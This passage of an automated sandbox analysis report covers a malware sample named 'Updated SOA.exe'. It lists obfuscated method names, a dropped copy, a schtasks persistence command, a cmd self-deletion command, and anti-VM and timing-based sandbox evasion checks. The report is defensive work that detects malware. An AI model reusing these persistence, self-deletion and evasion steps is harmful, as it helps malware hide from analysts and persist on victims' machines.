          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B81B push eax; ret 18_2_0013B882
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B87C push eax; ret 18_2_0013B882
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CBE6 push dword ptr [2E339416h]; ret 18_2_0013CCB6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013B7C5 push eax; ret 18_2_0013B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74077880888
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74077880888
          Source: Updated SOA.exe, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: Updated SOA.exe, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: Updated SOA.exe, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: Updated SOA.exe, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: Updated SOA.exe, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: Updated SOA.exe, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: Updated SOA.exe, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: Updated SOA.exe, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: Updated SOA.exe, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: oydxFbGhGlh.exe.0.dr, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: oydxFbGhGlh.exe.0.dr, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: oydxFbGhGlh.exe.0.dr, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: oydxFbGhGlh.exe.0.dr, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: oydxFbGhGlh.exe.0.dr, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: oydxFbGhGlh.exe.0.dr, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: oydxFbGhGlh.exe.0.dr, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: oydxFbGhGlh.exe.0.dr, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: oydxFbGhGlh.exe.0.dr, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 0.0.Updated SOA.exe.770000.0.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 0.2.Updated SOA.exe.770000.0.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 7.0.Updated SOA.exe.4e0000.0.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, ouvv0WJHyJWQUOClRG/EjIZaXsUncXxeKmixm.csHigh entropy of concatenated method names: '.ctor', 'dtxWZJx9Mi', 'dJKWkrR5u8', 'Connect', 'cHDWFCyXgr', 'VmxWuY1vxT', 'ITEW3w9V62', 'uolWLVMFI5', 'XobWSYt4Zp', 'RHEWx8gX8r'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, YQ2KDc2aZEEah2yuwx/j1OnOAcbGyN30dtHtt.csHigh entropy of concatenated method names: 'Vxy8KOGtJ', 'rlrjIAuPG', '.ctor', 'yuRaJdrYl', 'XFAoOU2sq', 'BF0qWiitm', 'J30GMbOkm', 'XFmmrHl0i', 'Sa5UXWaQ4', 'asoIX9nyX'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, JqWuUybGmoYUMunIyM/YsjO2LWgmBAxJ4sEd8.csHigh entropy of concatenated method names: 'qHMlH8O5T', 'dHHBnyiqA', 'y3LfPUNax', 'coZ6sHLXe', 'IuPhK8Imt', 'U7NpuBhW8', 'M6rCRlcAh', 'STCssM1OR', 'l2KXDcaZE', 'YahH2yuwx'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, idk1ttpl989afRHm6N/qKOGtJhglrIAuPGHLY.csHigh entropy of concatenated method names: '.ctor', 'zZIWyPKVYQ', 'gPxWgSphqx', 'Dispose', 'QnfWl12Riw', 'B6jvdXpSDUiBfwbPHUQ', 'EhjsT5pCovsESNVJEP8', 'FIdW1dpIOViyYYGGjAY', 'HncTJCpTPurkqR5x1kK', 'zoA3FLp4gB7Dxr48fIy'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, h4j3V11pFbKgZ1IrWX/O3UuHBHxm8cgV0dKKC.csHigh entropy of concatenated method names: '.ctor', 'x3EtnhpwDb', 'DrOt9WUiVA', 'Dispose', 'mgetvsql6k', 'Vbl1nupkkjj3aKLsnvE', 'vb7KTSppxZpb1vODQyR', 'oLMUogp5puC9vnH3xng', 'd1T3kepAl1Hw4xdeBmV', 'NVxhaop7n6984hXRGpl'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, Imow1gKUOFLmaBVvLf/eSjr0pANSPdjGWVQhY.csHigh entropy of concatenated method names: 'ncsLGjLE7', 'j3wSZHav5', '.ctor', '.ctor', 'rJguWVZx4', 'ToString', 'OgY3y2dXf', '.cctor', 'x7LIayhLhvRCNMb4KO', 'c980ZSJn4jwW8RWmja'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, oFHLGQXGbDEbjZmPcr/ehmTCsTM1ORrjiAcsS.csHigh entropy of concatenated method names: 'TJVt1cly5m', 'jpItg4nj8J', 'yyjtH2AZMZ', 'ofctB9KCF1', 'WmQtRRWAwW', 'DJWt6kBUBK', 'Wd9thLSZLN', '.ctor', 'ToString', '.cctor'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, Ktk42cvwX2ewXGmd3b/bQxvDC9oymoWQnv1Zc.csHigh entropy of concatenated method names: 'AsUb45mhiy', 'BZlbh26DQ2', 'bUkbeixVvs', 'fmIbsK9iJi', 'BKDbJ2e9E1', 'pN2brgRYDf', 'YJVbn08UOn', 'tfPbvGyAkP', 'ICZbYumWZA', 'g8bbko1odd'
          Source: 7.2.Updated SOA.exe.4e0000.1.unpack, XE1acXOZyHMH8O5TWH/qbV8XNw4frnrlJnkqt.csHigh entropy of concatenated method names: 'jYGzlbThX', 'FRCidd6PGt', 'Dawit5Dvvj', 'UZaiWXUncX', 'IvviA0WHyJ', 'cQUiKOClRG', 'WyYi2tGyf8', 'jBEiwO56w0', 'S5tiVQxvDC', 'QymiDoWQnv'
          Source: C:\Users\user\Desktop\Updated SOA.exeFile created: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\Updated SOA.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Updated SOA.exe PID: 1380, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Updated SOA.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Updated SOA.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000128614 second address: 000000000012861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000001289AE second address: 00000000001289B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Updated SOA.exe TID: 4232Thread sleep time: -35013s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exe TID: 2204Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6760Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6236Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
